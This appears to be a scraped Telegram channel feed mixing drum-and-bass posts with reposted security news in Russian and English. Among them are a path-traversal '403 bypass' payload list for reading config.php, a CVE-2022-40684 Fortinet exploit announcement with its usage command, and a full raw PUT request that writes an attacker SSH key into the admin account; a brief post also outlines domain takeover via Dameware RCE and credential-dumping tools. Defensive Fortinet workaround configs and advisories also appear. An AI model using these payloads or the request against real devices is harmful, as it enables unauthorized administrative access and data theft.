Devious Methods
194 subscribers
153 photos
14 videos
65 files
535 links
Underground music / Cyberpunk stories
Download Telegram
New 403 Bypass 🔥🔥🔥🔥

Unicode Encoding
Try:


Download.php?file=.⨀/config.php
Download.php?file=⊡⨀/config.php
Download.php?file=⊡./config.php


pr0xy.cc/bsides.pdf
Forwarded from SecAtor
Fortinet в частном порядке предупредила клиентов об уязвимости в системе безопасности, затрагивающей брандмауэры FortiGate и веб-прокси FortiProxy.

Критическая уязвимость CVE-2022-40684 имеет оценку CVSS 9,6 и связана с уязвимостью обхода аутентификации, которая может позволить злоумышленнику, не прошедшему проверку подлинности, выполнять произвольные операции в административном интерфейсе с помощью специально созданных запросов HTTP или HTTPS.

Ошибка затрагивает следующие версии FortiOS с 7.0.0 до 7.0.6 и с 7.2.0 до 7.2.1, FortiProxy с 7.0.0 на 7.0.6 и 7.2.0. Fortinet откладывает публичное раскрытие уязвимости и подробности атак с ее использованием до тех пор, пока ее клиенты не применят исправления.

Проблема исправлена в FortiOS 7.0.7 и 7.2.2, а также в версиях FortiProxy 7.0.7 и 7.2.1.

Принимая во внимание возможность удаленной эксплуатации этой проблемы и доступность, согласно поиску Shodan, более 100 000 брандмауэров FortiGate в сети, Fortinet настоятельно рекомендует всем клиентам с уязвимыми версиями выполнить немедленное обновление.

В качестве временного обходного пути Fortinet рекомендует пользователям отключить администрирование HTTPS с выходом в Интернет до тех пор, пока не будут установлены обновления, или, в качестве альтернативы, ограничить IP-адреса, которые могут получить доступ к административному интерфейсу с помощью локальной политики.
The Ultimate old skool Drum and Bass 1992-1995.mp4
80.3 MB
🎶 ULTIMATE OLD SKOOL D&B 1992-1995 💥

Track Listing with Start/End Times:
Spiritual Aura - Engineers Without Fears
0:00:00 - 0:05:31
Breakage#4 - Noise Factory
0:03:29 - 0:08:15
Thunder (Original Mix) - The Rood Project
0:06:56 - 0:11:37
We Enter (Heavenly Remix) - Aladdin
0:10:48 - 0:17:22
The VIP (Final Chapter) - DJ Taktix
0:16:31 - 0:22:43
So Good (Heavy Mix) - Aladdin
0:21:16 - 0:26:56
A London Sumtin' (Tek 9 Remix) - Code 071
0:26:09 - 0:31:02
Session One (Riots in Rayleigh) - Sonz Of A Loop Da Loop Era
0:29:54 - 0:36:22
Summer Breeze - Tek 9
0:35:08 - 0:39:41
The Mutant Remix - Rollers Instinct (Remix By DJ Trace) - T Power & The Sandman
0:38:28 - 0:44:49
Rollidge (Bonus Track) - DJ SS
0:42:34 - 0:49:51
Oh Gosh! - Undercover Agent
0:49:27 - 0:54:19
Being With You - Foul Play
0:52:44 - 0:59:18
Beats Track - Foul Play
0:56:26 - 1:03:24
Renegade Snares (Foul Play VIP Mix) - Omni Trio
1:02:58 - 1:08:20
Music Is The Key - Foul Play
1:07:55 - 1:12:53
1
🇹🇷 Как один турок, домен ломал…

Если вкратце, то пробив был через RCE в Dameware Mini Remote Control.

Nessus сканер легко эту уязвимость определяет на порту 6291/tcp

Далее берем модифицированный PoC и исполняем команду, а там уже дело техники: mimikatz, bloodhound, crackmapexec…

https://bariskoparmal-com.translate.goog/2021/02/01/domain-admine-uzanan-yolculuk/?_x_tr_sl=tr&_x_tr_tl=ru&_x_tr_hl=ru&_x_tr_pto=sc
S02E40
VISION Radio
VISION Radio this week has our man of the moment, Icicle on hosting duties! We listen to the full ‘Post’ album plus some of the songs that inspired his ideas behind the music. You can find an in-depth interview with Jeroen on our Patreon. Enjoy!
#DNB #Icicle #Noisia
🔥2
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Анонс всех докладов на завтра (14 Октября)
 
До дня Х осталось меньше суток, завтра по плану будет:

— 11:00 - Вступительное слово
— 11:15 - Сабыржан "novitoll" Тасболатов: Практический опыт с 4G, 5G
— 12:15 - Нурбиби "R0b0Cat": Шаблонизация Linux систем в организациях
— 13:00 - Обед
— 14:00 - Дмитрий "ватман": CDC
— 14:50 - Kutlymurat "manfromkz" Mambetniyazov: История одного CVE
— 15:20 - Roman "sysroman": Ansible AWX by Oracle
— 15:45 - кофе-брейк
— 16:00 - Shelldon "Sh3lldon": DEP vs ROP
— 16:50 - Ilyas B Arinov "t2micro": Старый... Но не бесполезный IRC
— 17:20 - Айдар Оспанбеков: Сети (хуети) в современном датацентре
— 18:05 - Yevgeniy "sysadminkz": Неявный превентинг констракшн

План может меняться, уж не обессудьте. Заряжаем себя и друзей, находим силы и возможности и проводим нашу встречу в добром здравии и отношении.

☀️ Завтра встречаем Вас на первом этаже - ул. Байзакова 280 в SmartPoint, г.Алматы
⚡️ Кто не зарегистрировался, зарегистрируйтесь пожалуйста иначе мест Вам может не хватить, детали здесь: https://sysconf.io

Всем Peace ✌️
👍3
Forwarded from Private Shizo
exploit.py
1.9 KB
🔥🔥🔥CVE-2022-40684 - Auth bypass extract admin users and LDAP config - This PoC do only read-only actions.

how to use exploit?
python3 exploit.py targetSite
FORTINET NIGHTMARE… xd
Proof of Concept for FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)

💥This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 612 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\”” }


https://github.com/horizon3ai/CVE-2022-40684
🔥1
🚨Fortinet предлагает workaround в статье и я ее перевел на свой лад

Summary (Описание):

ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.

Exploitation Status (Статус эксплуатации):

Искать в логах IoC:

user=«Local_Process_Acess»

Workaround (Заплатка на жопу):

FortiOS:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Настроить access list:

config firewall address

edit "my_allowed_addresses"

set subnet <MY IP> <MY SUBNET>

end


Создать Address Group:

config firewall addrgrp

edit "MGMT_IPs"

set member "my_allowed_addresses"

end



Создать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:

config firewall local-in-policy

edit 1

set intf port1

set srcaddr "MGMT_IPs"

set dstaddr "all"

set action accept

set service HTTPS HTTP

set schedule "always"

set status enable

next

edit 2

set intf "any"

set srcaddr "all"

set dstaddr "all"

set action deny

set service HTTPS HTTP

set schedule "always"

set status enable

end


FortiProxy:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Настроить access list для доступа к порту 1:

config system interface

edit port1

set dedicated-to management

set trust-ip-1 <MY IP> <MY SUBNET>

end


FortiSwitchManager:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Affected Products (Продукты попавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0

Solutions (Сделайте апгрейд ОС ASAP!!!)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
🔥1
Forwarded from k8s (in)security (Дмитрий Евдокимов)
В сети стала доступна видеозапись доклад "Pentesting Kubernetes: From Zero to Hero" (и слайды) от моего коллеги Сергея Канибора с VolgaCTF 2022!

Данный доклад скорее является RoadMap, а не полной инструкцией по пентесту Kubernetes. Уместить некоторые моменты в пределах одного доклада не представляется возможным. Так же как и рассказать о всех возможных техниках и нюансах с которыми можно столкнуться при пентесте Kubernetes кластера. Но мы постарались это рассказать максимально компактно и понятно.

Если вы только начинаете свой путь в этом направлении, то это прям MUST WATCH!
делюсь ништяками…

Wub wub wub dubstep

https://on.soundcloud.com/DSAj4PDXqVz2nBWg8
Forwarded from SecuriXy.kz
#CVE-2022-42889 #Apache #RCE #4Shell

Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.

Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
🔥1
OSCE3 holder
🔥1